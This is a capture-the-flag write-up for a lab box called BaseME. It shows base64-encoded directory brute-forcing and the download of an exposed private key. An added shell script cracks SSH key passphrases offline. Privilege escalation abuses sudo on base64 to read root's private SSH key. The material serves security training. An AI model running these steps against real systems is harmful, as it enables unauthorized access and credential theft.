BaseME

Described as "CTF like"

Nmap results:

If we take a look at port 80 in a web browser, we get a really long string that appears to be base64 encoded. As always, view the page source as well.

Let's save the long string to string.txt and decode it with base64 -d string.txt

OK, so base64 is our friend. So I think we need to encode the commented lines in the source to base64 and see which one gets us in via SSH with the username lucas.

We can do this quickly with a simple for loop. Note that echo appends a newline, so each line of base64.txt is the encoding of the word plus a trailing newline, not of the bare word:

for i in $(cat pass.txt); do echo $i | base64 >> base64.txt; done

Once that's done, we can use hydra to brute force SSH with our base64.txt file as the password list.

Or so I thought. I ran dirb, gobuster and dirbuster and came up empty-handed. "BASE64 has the answer to all your questions." Hmm.

Let's take a wordlist, convert it to base64 and run it through gobuster.

Another for loop will make quick work of this.

for i in $(cat /usr/share/seclists/Discovery/Web-Content/common.txt);do echo $i | base64 >> dict64.txt;done

Aha! Both of these are files, and the long one caught my interest first.

Fetch /aWRfcnNhCg== from the web server and decode it (curl -s http://<target>/aWRfcnNhCg== | base64 -d > id_rsa, with <target> being the box's address) and you will find that it is an id_rsa private key file. The path name itself is the base64 of "id_rsa" followed by a newline, which is exactly what the echo-based loop produced; encoding the word without the newline (aWRfcnNh) would not have found it.

Passphrase for key? Hmm. Oh, I bet it was one of the ones from the base64.txt file we made earlier.
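The two base64 loops above and the passphrase guess can be done in one place with a small script. This is an added example, not code from the original write-up or from the room: it builds the base64 wordlist with and without the trailing newline, and then tries every line as the passphrase of an encrypted SSH key offline with ssh-keygen, which avoids hammering the SSH service. It assumes the coreutils base64 command and ssh-keygen are installed; the file names, the three-word sample list and the throwaway key are constructed for the demo.

```shell
#!/bin/sh
# Added example, not part of the original write-up or the room: build the
# base64 wordlist the room expects and try candidate passphrases against
# an encrypted SSH key offline. Assumptions: coreutils base64 and
# ssh-keygen are available; file names are illustrative.

# Encode one word exactly as `echo word | base64` does: the newline that
# echo appends is part of the plaintext, so "id_rsa" becomes aWRfcnNhCg==
# and matches the path that exists on the server. tr strips the wrapping
# GNU base64 inserts after 76 characters, so long words stay on one line.
b64_with_newline() {
    printf '%s\n' "$(printf '%s\n' "$1" | base64 | tr -d '\n')"
}

# Same word without the trailing newline ("id_rsa" -> aWRfcnNh). Worth
# keeping in the list too, since a different author might have encoded
# the names with echo -n or a scripting language.
b64_no_newline() {
    printf '%s\n' "$(printf '%s' "$1" | base64 | tr -d '\n')"
}

# Turn a plaintext wordlist into a base64 wordlist holding both variants
# of every entry, deduplicated. `while read -r` keeps entries containing
# spaces or backslashes intact, which `for i in $(cat ...)` does not.
make_b64_wordlist() {
    in="$1"; out="$2"
    : > "$out"
    while IFS= read -r word || [ -n "$word" ]; do
        if [ -n "$word" ]; then
            b64_with_newline "$word" >> "$out"
            b64_no_newline "$word" >> "$out"
        fi
    done < "$in"
    sort -u "$out" -o "$out"
}

# Try each line of a wordlist as the passphrase of an encrypted private
# key. ssh-keygen -y prints the public key only if the passphrase decrypts
# the key, so no network access or SSH server is needed. Prints the
# matching passphrase and returns 0, or returns 1 if nothing matched.
crack_key_passphrase() {
    key="$1"; list="$2"
    while IFS= read -r pass || [ -n "$pass" ]; do
        if ssh-keygen -y -P "$pass" -f "$key" >/dev/null 2>&1; then
            printf '%s\n' "$pass"
            return 0
        fi
    done < "$list"
    return 1
}

# Stand-alone demo on a constructed three-word list (the room's real list
# is SecLists common.txt). The passphrase step only runs when ssh-keygen
# is installed.
demo_dir=$(mktemp -d)
printf 'id_rsa\nrobots.txt\nadmin\n' > "$demo_dir/words.txt"
make_b64_wordlist "$demo_dir/words.txt" "$demo_dir/dict64.txt"
cat "$demo_dir/dict64.txt"
if command -v ssh-keygen >/dev/null 2>&1; then
    # Throwaway key whose passphrase is one of the encoded words, then
    # recover it from the wordlist, as for the id_rsa found on the box.
    ssh-keygen -q -t ed25519 -N "$(b64_with_newline admin)" \
        -f "$demo_dir/key" </dev/null
    crack_key_passphrase "$demo_dir/key" "$demo_dir/dict64.txt" \
        || echo "no passphrase in the list matched"
fi
rm -rf "$demo_dir"
```

Feed the generated list to gobuster with gobuster dir -u http://<target> -w dict64.txt, and run crack_key_passphrase against the downloaded key with base64.txt as the list. Once it prints the passphrase, chmod 600 id_rsa and connect with ssh -i id_rsa lucas@<target>. The usual alternative is ssh2john followed by john with the same wordlist; the ssh-keygen loop just avoids the extra tooling for a list this short.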

Privilege Escalation

Checking what lucas can run with sudo (sudo -l) points at /usr/bin/base64, so head over to GTFOBins and look for base64.

So we can read root's /root/root.txt file and get the flag, but we are not root. Let's see if we can get a root shell.

What we need to do is read /root/.ssh/id_rsa, which sudo lets us pass to base64 as root:

sudo /usr/bin/base64 /root/.ssh/id_rsa > rootrsa

Then we decode that into an id_rsa file with the restrictive permissions ssh insists on for private keys:

base64 -d rootrsa > id_rsa && chmod 600 id_rsa

We can now SSH in as root (this only works because sshd on the box permits key-based root login, which it does here):

ssh -i id_rsa root@localhost

Bam!!

Reading the root.txt flag as lucas is enough to submit the flag, but as a penetration tester the ultimate goal is to gain root.
